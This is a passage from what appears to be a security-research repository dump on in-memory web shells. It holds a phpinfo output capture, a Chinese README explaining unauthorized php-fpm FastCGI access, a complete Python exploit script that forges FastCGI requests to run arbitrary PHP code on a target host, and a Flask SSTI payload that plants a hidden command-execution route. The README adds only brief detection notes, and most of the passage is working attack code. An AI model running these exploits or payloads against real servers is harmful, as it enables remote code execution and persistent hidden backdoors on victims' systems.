820 | <tr><td class="e">$_SERVER['SERVER_ADDR']</td><td class="v">127.0.0.1</td></tr>
821 | <tr><td class="e">$_SERVER['REMOTE_PORT']</td><td class="v">9985</td></tr>
822 | <tr><td class="e">$_SERVER['REMOTE_ADDR']</td><td class="v">127.0.0.1</td></tr>
823 | <tr><td class="e">$_SERVER['SERVER_SOFTWARE']</td><td class="v">php/fcgiclient</td></tr>
824 | <tr><td class="e">$_SERVER['DOCUMENT_ROOT']</td><td class="v">/</td></tr>
825 | <tr><td class="e">$_SERVER['REQUEST_URI']</td><td class="v">/www/wwwroot/index.php</td></tr>
826 | <tr><td class="e">$_SERVER['QUERY_STRING']</td><td class="v"><i>no value</i></td></tr>
827 | <tr><td class="e">$_SERVER['SCRIPT_NAME']</td><td class="v">/www/wwwroot/index.php</td></tr>
828 | <tr><td class="e">$_SERVER['SCRIPT_FILENAME']</td><td class="v">/www/wwwroot/index.php</td></tr>
829 | <tr><td class="e">$_SERVER['REQUEST_METHOD']</td><td class="v">POST</td></tr>
830 | <tr><td class="e">$_SERVER['GATEWAY_INTERFACE']</td><td class="v">FastCGI/1.0</td></tr>
831 | <tr><td class="e">$_SERVER['FCGI_ROLE']</td><td class="v">RESPONDER</td></tr>
832 | <tr><td class="e">$_SERVER['PHP_SELF']</td><td class="v">/www/wwwroot/index.php</td></tr>
833 | <tr><td class="e">$_SERVER['REQUEST_TIME_FLOAT']</td><td class="v">1618828793.4175</td></tr>
834 | <tr><td class="e">$_SERVER['REQUEST_TIME']</td><td class="v">1618828793</td></tr>
835 | </table>
836 | <hr />
837 | <h1>PHP Credits</h1>
838 | <table>
839 | <tr class="h"><th>PHP Group</th></tr>
840 | <tr><td class="e">Thies C. Arntzen, Stig Bakken, Shane Caraveo, Andi Gutmans, Rasmus Lerdorf, Sam Ruby, Sascha Schumann, Zeev Suraski, Jim Winstead, Andrei Zmievski </td></tr>
841 | </table>
842 | <table>
843 | <tr class="h"><th>Language Design &amp; Concept</th></tr>
844 | <tr><td class="e">Andi Gutmans, Rasmus Lerdorf, Zeev Suraski, Marcus Boerger </td></tr>
845 | </table>
846 | <table>
847 | <tr class="h"><th colspan="2">PHP Authors</th></tr>
848 | <tr class="h"><th>Contribution</th><th>Authors</th></tr>
849 | <tr><td class="e">Zend Scripting Language Engine </td><td class="v">Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Marcus Boerger, Dmitry Stogov, Xinchen Hui, Nikita Popov </td></tr>
850 | <tr><td class="e">Extension Module API </td><td class="v">Andi Gutmans, Zeev Suraski, Andrei Zmievski </td></tr>
851 | <tr><td class="e">UNIX Build and Modularization </td><td class="v">Stig Bakken, Sascha Schumann, Jani Taskinen </td></tr>
852 | <tr><td class="e">Windows Support </td><td class="v">Shane Caraveo, Zeev Suraski, Wez Furlong, Pierre-Alain Joye, Anatol Belski, Kalle Sommer Nielsen </td></tr>
853 | <tr><td class="e">Server API (SAPI) Abstraction Layer </td><td class="v">Andi Gutmans, Shane Caraveo, Zeev Suraski </td></tr>
854 | <tr><td class="e">Streams Abstraction Layer </td><td class="v">Wez Furlong, Sara Golemon </td></tr>
855 | <tr><td class="e">PHP Data Objects Layer </td><td class="v">Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky </td></tr>
856 | <tr><td class="e">Output Handler </td><td class="v">Zeev Suraski, Thies C. Arntzen, Marcus Boerger, Michael Wallner </td></tr>
857 | <tr><td class="e">Consistent 64 bit support </td><td class="v">Anthony Ferrara, Anatol Belski </td></tr>
858 | </table>
859 | <table>
860 | <tr class="h"><th colspan="2">SAPI Modules</th></tr>
861 | <tr class="h"><th>Contribution</th><th>Authors</th></tr>
862 | <tr><td class="e">Apache 2.0 Handler </td><td class="v">Ian Holsman, Justin Erenkrantz (based on Apache 2.0 Filter code) </td></tr>
863 | <tr><td class="e">CGI / FastCGI </td><td class="v">Rasmus Lerdorf, Stig Bakken, Shane Caraveo, Dmitry Stogov </td></tr>
864 | <tr><td class="e">CLI </td><td class="v">Edin Kadribasic, Marcus Boerger, Johannes Schlueter, Moriyoshi Koizumi, Xinchen Hui </td></tr>
865 | <tr><td class="e">Embed </td><td class="v">Edin Kadribasic </td></tr>
866 | <tr><td class="e">FastCGI Process Manager </td><td class="v">Andrei Nigmatulin, dreamcat4, Antony Dovgal, Jerome Loyet </td></tr>
867 | <tr><td class="e">litespeed </td><td class="v">George Wang </td></tr>
868 | <tr><td class="e">phpdbg </td><td class="v">Felipe Pena, Joe Watkins, Bob Weinand </td></tr>
869 | </table>
870 | <table>
871 | <tr class="h"><th colspan="2">Module Authors</th></tr>
872 | <tr class="h"><th>Module</th><th>Authors</th></tr>
873 | <tr><td class="e">BC Math </td><td class="v">Andi Gutmans </td></tr>
874 | <tr><td class="e">Bzip2 </td><td class="v">Sterling Hughes </td></tr>
875 | <tr><td class="e">Calendar </td><td class="v">Shane Caraveo, Colin Viebrock, Hartmut Holzgraefe, Wez Furlong </td></tr>
876 | <tr><td class="e">COM and .Net </td><td class="v">Wez Furlong </td></tr>
877 | <tr><td class="e">ctype </td><td class="v">Hartmut Holzgraefe </td></tr>
878 | <tr><td class="e">cURL </td><td class="v">Sterling Hughes </td></tr>
879 | <tr><td class="e">Date/Time Support </td><td class="v">Derick Rethans </td></tr>
880 | <tr><td class="e">DB-LIB (MS SQL, Sybase) </td><td class="v">Wez Furlong, Frank M. Kromann, Adam Baratz </td></tr>
881 | <tr><td class="e">DBA </td><td class="v">Sascha Schumann, Marcus Boerger </td></tr>
882 | <tr><td class="e">DOM </td><td class="v">Christian Stocker, Rob Richards, Marcus Boerger </td></tr>
883 | <tr><td class="e">enchant </td><td class="v">Pierre-Alain Joye, Ilia Alshanetsky </td></tr>
884 | <tr><td class="e">EXIF </td><td class="v">Rasmus Lerdorf, Marcus Boerger </td></tr>
885 | <tr><td class="e">fileinfo </td><td class="v">Ilia Alshanetsky, Pierre Alain Joye, Scott MacVicar, Derick Rethans, Anatol Belski </td></tr>
886 | <tr><td class="e">Firebird driver for PDO </td><td class="v">Ard Biesheuvel </td></tr>
887 | <tr><td class="e">FTP </td><td class="v">Stefan Esser, Andrew Skalski </td></tr>
888 | <tr><td class="e">GD imaging </td><td class="v">Rasmus Lerdorf, Stig Bakken, Jim Winstead, Jouni Ahto, Ilia Alshanetsky, Pierre-Alain Joye, Marcus Boerger </td></tr>
889 | <tr><td class="e">GetText </td><td class="v">Alex Plotnick </td></tr>
890 | <tr><td class="e">GNU GMP support </td><td class="v">Stanislav Malyshev </td></tr>
891 | <tr><td class="e">Iconv </td><td class="v">Rui Hirokawa, Stig Bakken, Moriyoshi Koizumi </td></tr>
892 | <tr><td class="e">IMAP </td><td class="v">Rex Logan, Mark Musone, Brian Wang, Kaj-Michael Lang, Antoni Pamies Olive, Rasmus Lerdorf, Andrew Skalski, Chuck Hagenbuch, Daniel R Kalowsky </td></tr>
893 | <tr><td class="e">Input Filter </td><td class="v">Rasmus Lerdorf, Derick Rethans, Pierre-Alain Joye, Ilia Alshanetsky </td></tr>
894 | <tr><td class="e">InterBase </td><td class="v">Jouni Ahto, Andrew Avdeev, Ard Biesheuvel </td></tr>
895 | <tr><td class="e">Internationalization </td><td class="v">Ed Batutis, Vladimir Iordanov, Dmitry Lakhtyuk, Stanislav Malyshev, Vadim Savchuk, Kirti Velankar </td></tr>
896 | <tr><td class="e">JSON </td><td class="v">Jakub Zelenka, Omar Kilani, Scott MacVicar </td></tr>
897 | <tr><td class="e">LDAP </td><td class="v">Amitay Isaacs, Eric Warnke, Rasmus Lerdorf, Gerrit Thomson, Stig Venaas </td></tr>
898 | <tr><td class="e">LIBXML </td><td class="v">Christian Stocker, Rob Richards, Marcus Boerger, Wez Furlong, Shane Caraveo </td></tr>
899 | <tr><td class="e">Multibyte String Functions </td><td class="v">Tsukada Takuya, Rui Hirokawa </td></tr>
900 | <tr><td class="e">MySQL driver for PDO </td><td class="v">George Schlossnagle, Wez Furlong, Ilia Alshanetsky, Johannes Schlueter </td></tr>
901 | <tr><td class="e">MySQLi </td><td class="v">Zak Greant, Georg Richter, Andrey Hristov, Ulf Wendel </td></tr>
902 | <tr><td class="e">MySQLnd </td><td class="v">Andrey Hristov, Ulf Wendel, Georg Richter, Johannes Schlüter </td></tr>
903 | <tr><td class="e">OCI8 </td><td class="v">Stig Bakken, Thies C. Arntzen, Andy Sautins, David Benson, Maxim Maletsky, Harald Radi, Antony Dovgal, Andi Gutmans, Wez Furlong, Christopher Jones, Oracle Corporation </td></tr>
904 | <tr><td class="e">ODBC driver for PDO </td><td class="v">Wez Furlong </td></tr>
905 | <tr><td class="e">ODBC </td><td class="v">Stig Bakken, Andreas Karajannis, Frank M. Kromann, Daniel R. Kalowsky </td></tr>
906 | <tr><td class="e">Opcache </td><td class="v">Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Dmitry Stogov, Xinchen Hui </td></tr>
907 | <tr><td class="e">OpenSSL </td><td class="v">Stig Venaas, Wez Furlong, Sascha Kettler, Scott MacVicar </td></tr>
908 | <tr><td class="e">Oracle (OCI) driver for PDO </td><td class="v">Wez Furlong </td></tr>
909 | <tr><td class="e">pcntl </td><td class="v">Jason Greene, Arnaud Le Blanc </td></tr>
910 | <tr><td class="e">Perl Compatible Regexps </td><td class="v">Andrei Zmievski </td></tr>
911 | <tr><td class="e">PHP Archive </td><td class="v">Gregory Beaver, Marcus Boerger </td></tr>
912 | <tr><td class="e">PHP Data Objects </td><td class="v">Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky </td></tr>
913 | <tr><td class="e">PHP hash </td><td class="v">Sara Golemon, Rasmus Lerdorf, Stefan Esser, Michael Wallner, Scott MacVicar </td></tr>
914 | <tr><td class="e">Posix </td><td class="v">Kristian Koehntopp </td></tr>
915 | <tr><td class="e">PostgreSQL driver for PDO </td><td class="v">Edin Kadribasic, Ilia Alshanetsky </td></tr>
916 | <tr><td class="e">PostgreSQL </td><td class="v">Jouni Ahto, Zeev Suraski, Yasuo Ohgaki, Chris Kings-Lynne </td></tr>
917 | <tr><td class="e">Pspell </td><td class="v">Vlad Krupin </td></tr>
918 | <tr><td class="e">Readline </td><td class="v">Thies C. Arntzen </td></tr>
919 | <tr><td class="e">Recode </td><td class="v">Kristian Koehntopp </td></tr>
920 | <tr><td class="e">Reflection </td><td class="v">Marcus Boerger, Timm Friebe, George Schlossnagle, Andrei Zmievski, Johannes Schlueter </td></tr>
921 | <tr><td class="e">Sessions </td><td class="v">Sascha Schumann, Andrei Zmievski </td></tr>
922 | <tr><td class="e">Shared Memory Operations </td><td class="v">Slava Poliakov, Ilia Alshanetsky </td></tr>
923 | <tr><td class="e">SimpleXML </td><td class="v">Sterling Hughes, Marcus Boerger, Rob Richards </td></tr>
924 | <tr><td class="e">SNMP </td><td class="v">Rasmus Lerdorf, Harrie Hazewinkel, Mike Jackson, Steven Lawrance, Johann Hanne, Boris Lytochkin </td></tr>
925 | <tr><td class="e">SOAP </td><td class="v">Brad Lafountain, Shane Caraveo, Dmitry Stogov </td></tr>
926 | <tr><td class="e">Sockets </td><td class="v">Chris Vandomelen, Sterling Hughes, Daniel Beulshausen, Jason Greene </td></tr>
927 | <tr><td class="e">Sodium </td><td class="v">Frank Denis </td></tr>
928 | <tr><td class="e">SPL </td><td class="v">Marcus Boerger, Etienne Kneuss </td></tr>
929 | <tr><td class="e">SQLite 3.x driver for PDO </td><td class="v">Wez Furlong </td></tr>
930 | <tr><td class="e">SQLite3 </td><td class="v">Scott MacVicar, Ilia Alshanetsky, Brad Dewar </td></tr>
931 | <tr><td class="e">System V Message based IPC </td><td class="v">Wez Furlong </td></tr>
932 | <tr><td class="e">System V Semaphores </td><td class="v">Tom May </td></tr>
933 | <tr><td class="e">System V Shared Memory </td><td class="v">Christian Cartus </td></tr>
934 | <tr><td class="e">tidy </td><td class="v">John Coggeshall, Ilia Alshanetsky </td></tr>
935 | <tr><td class="e">tokenizer </td><td class="v">Andrei Zmievski, Johannes Schlueter </td></tr>
936 | <tr><td class="e">WDDX </td><td class="v">Andrei Zmievski </td></tr>
937 | <tr><td class="e">XML </td><td class="v">Stig Bakken, Thies C. Arntzen, Sterling Hughes </td></tr>
938 | <tr><td class="e">XMLReader </td><td class="v">Rob Richards </td></tr>
939 | <tr><td class="e">xmlrpc </td><td class="v">Dan Libby </td></tr>
940 | <tr><td class="e">XMLWriter </td><td class="v">Rob Richards, Pierre-Alain Joye </td></tr>
941 | <tr><td class="e">XSL </td><td class="v">Christian Stocker, Rob Richards </td></tr>
942 | <tr><td class="e">Zip </td><td class="v">Pierre-Alain Joye, Remi Collet </td></tr>
943 | <tr><td class="e">Zlib </td><td class="v">Rasmus Lerdorf, Stefan Roehrich, Zeev Suraski, Jade Nicoletti, Michael Wallner </td></tr>
944 | </table>
945 | <table>
946 | <tr class="h"><th colspan="2">PHP Documentation</th></tr>
947 | <tr><td class="e">Authors </td><td class="v">Mehdi Achour, Friedhelm Betz, Antony Dovgal, Nuno Lopes, Hannes Magnusson, Philip Olson, Georg Richter, Damien Seguy, Jakub Vrana, Adam Harvey </td></tr>
948 | <tr><td class="e">Editor </td><td class="v">Peter Cowburn </td></tr>
949 | <tr><td class="e">User Note Maintainers </td><td class="v">Daniel P. Brown, Thiago Henrique Pojda </td></tr>
950 | <tr><td class="e">Other Contributors </td><td class="v">Previously active authors, editors and other contributors are listed in the manual. </td></tr>
951 | </table>
952 | <table>
953 | <tr class="h"><th>PHP Quality Assurance Team</th></tr>
954 | <tr><td class="e">Ilia Alshanetsky, Joerg Behrens, Antony Dovgal, Stefan Esser, Moriyoshi Koizumi, Magnus Maatta, Sebastian Nohn, Derick Rethans, Melvyn Sopacua, Jani Taskinen, Pierre-Alain Joye, Dmitry Stogov, Felipe Pena, David Soria Parra, Stanislav Malyshev, Julien Pauli, Stephen Zarkos, Anatol Belski, Remi Collet, Ferenc Kovacs </td></tr>
955 | </table>
956 | <table>
957 | <tr class="h"><th colspan="2">Websites and Infrastructure team</th></tr>
958 | <tr><td class="e">PHP Websites Team </td><td class="v">Rasmus Lerdorf, Hannes Magnusson, Philip Olson, Lukas Kahwe Smith, Pierre-Alain Joye, Kalle Sommer Nielsen, Peter Cowburn, Adam Harvey, Ferenc Kovacs, Levi Morrison </td></tr>
959 | <tr><td class="e">Event Maintainers </td><td class="v">Damien Seguy, Daniel P. Brown </td></tr>
960 | <tr><td class="e">Network Infrastructure </td><td class="v">Daniel P. Brown </td></tr>
961 | <tr><td class="e">Windows Infrastructure </td><td class="v">Alex Schoenmaker </td></tr>
962 | </table>
963 | <h2>PHP License</h2>
964 | <table>
965 | <tr class="v"><td>
966 | <p>
967 | This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file:  LICENSE
968 | </p>
969 | <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
970 | </p>
971 | <p>If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license@php.net.
972 | </p>
973 | </td></tr>
974 | </table>
975 | </div></body></html>
976 | 


--------------------------------------------------------------------------------
/MemShellForPHP/通过php-fpm未授权访问漏洞攻击/README.md:
--------------------------------------------------------------------------------
 1 | # 通过php-fpm未授权访问漏洞攻击
 2 | 
 3 | ## 一、攻击原理
 4 | 
 5 | 当php-fpm对外开放时，通过构造Fastcgi协议（fastcgi协议是服务器中间件和后端进行数据交换的协议），通过向php-fpm发起请求执行任意文件。
 6 | 
 7 | php-fpm可以理解为fastcgi协议解析器，Nginx等服务器中间件将用户请求按照fastcgi的规则打包好通过TCP传给php-fpm，php-fpm按照fastcgi协议将TCP流解析成真正的数据。
 8 | 
 9 | 例如：如果我们请求http://127.0.0.1/index.php?a=1&b=2，如果web目录是/var/www/html，那么Nginx会根据该请求生成如下key-value对：
10 | 
11 | `
12 | {
13 |     'GATEWAY_INTERFACE': 'FastCGI/1.0',
14 |     'REQUEST_METHOD': 'GET',
15 |     'SCRIPT_FILENAME': '/var/www/html/index.php',
16 |     'SCRIPT_NAME': '/index.php',
17 |     'QUERY_STRING': '?a=1&b=2',
18 |     'REQUEST_URI': '/index.php?a=1&b=2',
19 |     'DOCUMENT_ROOT': '/var/www/html',
20 |     'SERVER_SOFTWARE': 'php/fcgiclient',
21 |     'REMOTE_ADDR': '127.0.0.1',
22 |     'REMOTE_PORT': '12345',
23 |     'SERVER_ADDR': '127.0.0.1',
24 |     'SERVER_PORT': '80',
25 |     'SERVER_NAME': "localhost",
26 |     'SERVER_PROTOCOL': 'HTTP/1.1'
27 | }
28 | `
29 | 
30 | SCRIPT_FILENAME的值指向的PHP文件将会被执行，也就是/var/www/html/index.php。
31 | 
32 | 因此，如果php-fpm对外暴露时，我们通过构造fastcgi协议直接发送给pfp-fpm，将会执行"任意文件"。
33 | 值得注意的是，这个任意文件必须是目标服务器上的文件。
34 | 如果想执行任意文件的话需要借助auto_prepend_file和auto_append_file。
35 | 
36 | auto_prepend_file是告诉PHP，在执行目标文件之前，先包含auto_prepend_file中指定的文件；
37 | auto_append_file是告诉PHP，在执行完成目标文件后，包含auto_append_file指向的文件。
38 | 
39 | 假设我们设置auto_prepend_file为php://input，那么就等于在执行任何php文件前都要包含一遍POST的内容。
40 | 所以，只需要把待执行的代码放在Body中就能被执行了。（当然，还需要开启远程文件包含选项allow_url_include）
41 | 
42 | 那么如何修改这两个值呢？
43 | 
44 | 这又涉及到PHP-FPM的两个环境变量，PHP_VALUE和PHP_ADMIN_VALUE。
45 | 这两个环境变量就是用来设置PHP配置项的，PHP_VALUE可以设置模式为PHP_INI_USER和PHP_INI_ALL的选项，PHP_ADMIN_VALUE可以设置所有选项。
46 | 经过测试，disable_functions除外，这个选项是PHP加载的时候就确定了，在范围内的函数直接不会被加载到PHP上下文中，貌似无法修改。
47 | 
48 | ```
49 | {
50 |     'GATEWAY_INTERFACE': 'FastCGI/1.0',
51 |     'REQUEST_METHOD': 'GET',
52 |     'SCRIPT_FILENAME': '/var/www/html/index.php',
53 |     'SCRIPT_NAME': '/index.php',
54 |     'QUERY_STRING': '?a=1&b=2',
55 |     'REQUEST_URI': '/index.php',
56 |     'DOCUMENT_ROOT': '/var/www/html',
57 |     'SERVER_SOFTWARE': 'php/fcgiclient',
58 |     'REMOTE_ADDR': '127.0.0.1',
59 |     'REMOTE_PORT': '12345',
60 |     'SERVER_ADDR': '127.0.0.1',
61 |     'SERVER_PORT': '80',
62 |     'SERVER_NAME': "localhost",
63 |     'SERVER_PROTOCOL': 'HTTP/1.1'
64 |     'PHP_VALUE': 'auto_prepend_file = php://input',
65 |     'PHP_ADMIN_VALUE': 'allow_url_include = On'
66 | }
67 | ```
68 | 
69 | ## 二、攻击demo
70 | 
71 | 见文件夹exp。
72 | 
73 | ## 三、检测方式
74 | 
75 | 1. 检查PHP_VALUE和PHP_ADMIN_VALUE中以上敏感字段是否被修改过。
76 | 2. 由于可能存在多个worker，因此通过循环请求多次。


--------------------------------------------------------------------------------
/MemShellForPHP/通过php-fpm未授权访问漏洞攻击/php-fpm-exp.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | import socket
  4 | import random
  5 | import argparse
  6 | import sys
  7 | from io import BytesIO
  8 | 
  9 | # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
 10 | 
 11 | PY2 = True if sys.version_info.major == 2 else False
 12 | 
 13 | 
 14 | def bchr(i):
 15 |     if PY2:
 16 |         return force_bytes(chr(i))
 17 |     else:
 18 |         return bytes([i])
 19 | 
 20 | def bord(c):
 21 |     if isinstance(c, int):
 22 |         return c
 23 |     else:
 24 |         return ord(c)
 25 | 
 26 | def force_bytes(s):
 27 |     if isinstance(s, bytes):
 28 |         return s
 29 |     else:
 30 |         return s.encode('utf-8', 'strict')
 31 | 
 32 | def force_text(s):
 33 |     if issubclass(type(s), str):
 34 |         return s
 35 |     if isinstance(s, bytes):
 36 |         s = str(s, 'utf-8', 'strict')
 37 |     else:
 38 |         s = str(s)
 39 |     return s
 40 | 
 41 | 
 42 | class FastCGIClient:
 43 |     """A Fast-CGI Client for Python"""
 44 | 
 45 |     # private
 46 |     __FCGI_VERSION = 1
 47 | 
 48 |     __FCGI_ROLE_RESPONDER = 1
 49 |     __FCGI_ROLE_AUTHORIZER = 2
 50 |     __FCGI_ROLE_FILTER = 3
 51 | 
 52 |     __FCGI_TYPE_BEGIN = 1
 53 |     __FCGI_TYPE_ABORT = 2
 54 |     __FCGI_TYPE_END = 3
 55 |     __FCGI_TYPE_PARAMS = 4
 56 |     __FCGI_TYPE_STDIN = 5
 57 |     __FCGI_TYPE_STDOUT = 6
 58 |     __FCGI_TYPE_STDERR = 7
 59 |     __FCGI_TYPE_DATA = 8
 60 |     __FCGI_TYPE_GETVALUES = 9
 61 |     __FCGI_TYPE_GETVALUES_RESULT = 10
 62 |     __FCGI_TYPE_UNKOWNTYPE = 11
 63 | 
 64 |     __FCGI_HEADER_SIZE = 8
 65 | 
 66 |     # request state
 67 |     FCGI_STATE_SEND = 1
 68 |     FCGI_STATE_ERROR = 2
 69 |     FCGI_STATE_SUCCESS = 3
 70 | 
 71 |     def __init__(self, host, port, timeout, keepalive):
 72 |         self.host = host
 73 |         self.port = port
 74 |         self.timeout = timeout
 75 |         if keepalive:
 76 |             self.keepalive = 1
 77 |         else:
 78 |             self.keepalive = 0
 79 |         self.sock = None
 80 |         self.requests = dict()
 81 | 
 82 |     def __connect(self):
 83 |         self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 84 |         self.sock.settimeout(self.timeout)
 85 |         self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
 86 |         # if self.keepalive:
 87 |         #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
 88 |         # else:
 89 |         #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
 90 |         try:
 91 |             self.sock.connect((self.host, int(self.port)))
 92 |         except socket.error as msg:
 93 |             self.sock.close()
 94 |             self.sock = None
 95 |             print(repr(msg))
 96 |             return False
 97 |         return True
 98 | 
 99 |     def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
100 |         length = len(content)
101 |         buf = bchr(FastCGIClient.__FCGI_VERSION) \
102 |                + bchr(fcgi_type) \
103 |                + bchr((requestid >> 8) & 0xFF) \
104 |                + bchr(requestid & 0xFF) \
105 |                + bchr((length >> 8) & 0xFF) \
106 |                + bchr(length & 0xFF) \
107 |                + bchr(0) \
108 |                + bchr(0) \
109 |                + content
110 |         return buf
111 | 
112 |     def __encodeNameValueParams(self, name, value):
113 |         nLen = len(name)
114 |         vLen = len(value)
115 |         record = b''
116 |         if nLen < 128:
117 |             record += bchr(nLen)
118 |         else:
119 |             record += bchr((nLen >> 24) | 0x80) \
120 |                       + bchr((nLen >> 16) & 0xFF) \
121 |                       + bchr((nLen >> 8) & 0xFF) \
122 |                       + bchr(nLen & 0xFF)
123 |         if vLen < 128:
124 |             record += bchr(vLen)
125 |         else:
126 |             record += bchr((vLen >> 24) | 0x80) \
127 |                       + bchr((vLen >> 16) & 0xFF) \
128 |                       + bchr((vLen >> 8) & 0xFF) \
129 |                       + bchr(vLen & 0xFF)
130 |         return record + name + value
131 | 
132 |     def __decodeFastCGIHeader(self, stream):
133 |         header = dict()
134 |         header['version'] = bord(stream[0])
135 |         header['type'] = bord(stream[1])
136 |         header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
137 |         header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
138 |         header['paddingLength'] = bord(stream[6])
139 |         header['reserved'] = bord(stream[7])
140 |         return header
141 | 
142 |     def __decodeFastCGIRecord(self, buffer):
143 |         header = buffer.read(int(self.__FCGI_HEADER_SIZE))
144 | 
145 |         if not header:
146 |             return False
147 |         else:
148 |             record = self.__decodeFastCGIHeader(header)
149 |             record['content'] = b''
150 |             
151 |             if 'contentLength' in record.keys():
152 |                 contentLength = int(record['contentLength'])
153 |                 record['content'] += buffer.read(contentLength)
154 |             if 'paddingLength' in record.keys():
155 |                 skiped = buffer.read(int(record['paddingLength']))
156 |             return record
157 | 
158 |     def request(self, nameValuePairs={}, post=''):
159 |         if not self.__connect():
160 |             print('connect failure! please check your fasctcgi-server !!')
161 |             return
162 | 
163 |         requestId = random.randint(1, (1 << 16) - 1)
164 |         self.requests[requestId] = dict()
165 |         request = b""
166 |         beginFCGIRecordContent = bchr(0) \
167 |                                  + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
168 |                                  + bchr(self.keepalive) \
169 |                                  + bchr(0) * 5
170 |         request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
171 |                                               beginFCGIRecordContent, requestId)
172 |         paramsRecord = b''
173 |         if nameValuePairs:
174 |             for (name, value) in nameValuePairs.items():
175 |                 name = force_bytes(name)
176 |                 value = force_bytes(value)
177 |                 paramsRecord += self.__encodeNameValueParams(name, value)
178 | 
179 |         if paramsRecord:
180 |             request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
181 |         request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)
182 | 
183 |         if post:
184 |             request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
185 |         request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
186 | 
187 |         self.sock.send(request)
188 |         self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
189 |         self.requests[requestId]['response'] = b''
190 |         return self.__waitForResponse(requestId)
191 | 
192 |     def __waitForResponse(self, requestId):
193 |         data = b''
194 |         while True:
195 |             buf = self.sock.recv(512)
196 |             if not len(buf):
197 |                 break
198 |             data += buf
199 | 
200 |         data = BytesIO(data)
201 |         while True:
202 |             response = self.__decodeFastCGIRecord(data)
203 |             if not response:
204 |                 break
205 |             if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
206 |                     or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
207 |                 if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
208 |                     self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
209 |                 if requestId == int(response['requestId']):
210 |                     self.requests[requestId]['response'] += response['content']
211 |             if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
212 |                 self.requests[requestId]
213 |         return self.requests[requestId]['response']
214 | 
215 |     def __repr__(self):
216 |         return "fastcgi connect host:{} port:{}".format(self.host, self.port)
217 | 
218 | 
219 | if __name__ == '__main__':
220 |     parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')
221 |     parser.add_argument('host', help='Target host, such as 127.0.0.1')
222 |     parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')
223 |     parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')
224 |     parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)
225 | 
226 |     args = parser.parse_args()
227 | 
228 |     client = FastCGIClient(args.host, args.port, 3, 0)
229 |     params = dict()
230 |     documentRoot = "/"
231 |     uri = args.file
232 |     content = args.code
233 |     params = {
234 |         'GATEWAY_INTERFACE': 'FastCGI/1.0',
235 |         'REQUEST_METHOD': 'POST',
236 |         'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
237 |         'SCRIPT_NAME': uri,
238 |         'QUERY_STRING': '',
239 |         'REQUEST_URI': uri,
240 |         'DOCUMENT_ROOT': documentRoot,
241 |         'SERVER_SOFTWARE': 'php/fcgiclient',
242 |         'REMOTE_ADDR': '127.0.0.1',
243 |         'REMOTE_PORT': '9985',
244 |         'SERVER_ADDR': '127.0.0.1',
245 |         'SERVER_PORT': '80',
246 |         'SERVER_NAME': "localhost",
247 |         'SERVER_PROTOCOL': 'HTTP/1.1',
248 |         'CONTENT_TYPE': 'application/text',
249 |         'CONTENT_LENGTH': "%d" % len(content),
250 |         'PHP_VALUE': 'auto_prepend_file = php://input',
251 |         'PHP_ADMIN_VALUE': 'allow_url_include = On'
252 |     }
253 |     print(content)
254 |     response = client.request(params, content)
255 |     print(force_text(response))


--------------------------------------------------------------------------------
/MemShellForPython/python flask 内存马.assets/image-20210329220246511.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForPython/python flask 内存马.assets/image-20210329220246511.png


--------------------------------------------------------------------------------
/MemShellForPython/python flask 内存马.assets/image-20210329220308313.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForPython/python flask 内存马.assets/image-20210329220308313.png


--------------------------------------------------------------------------------
/MemShellForPython/python flask 内存马.md:
--------------------------------------------------------------------------------
 1 | # python flask 内存马
 2 | 
 3 | 先起一个带有ssti的flask：
 4 | 
 5 | 插入路由：
 6 | 
 7 | ```
 8 | http://127.0.0.1:8000/test?param={{url_for.__globals__[%27__builtins__%27][%27eval%27](%22app.add_url_rule(%27/shell%27,%20%27shell%27,%20lambda%20:__import__(%27os%27).popen(_request_ctx_stack.top.request.args.get(%27cmd%27,%20%27whoami%27)).read())%22,{%27_request_ctx_stack%27:url_for.__globals__[%27_request_ctx_stack%27],%27app%27:url_for.__globals__[%27current_app%27]})}}
 9 | ```
10 | 
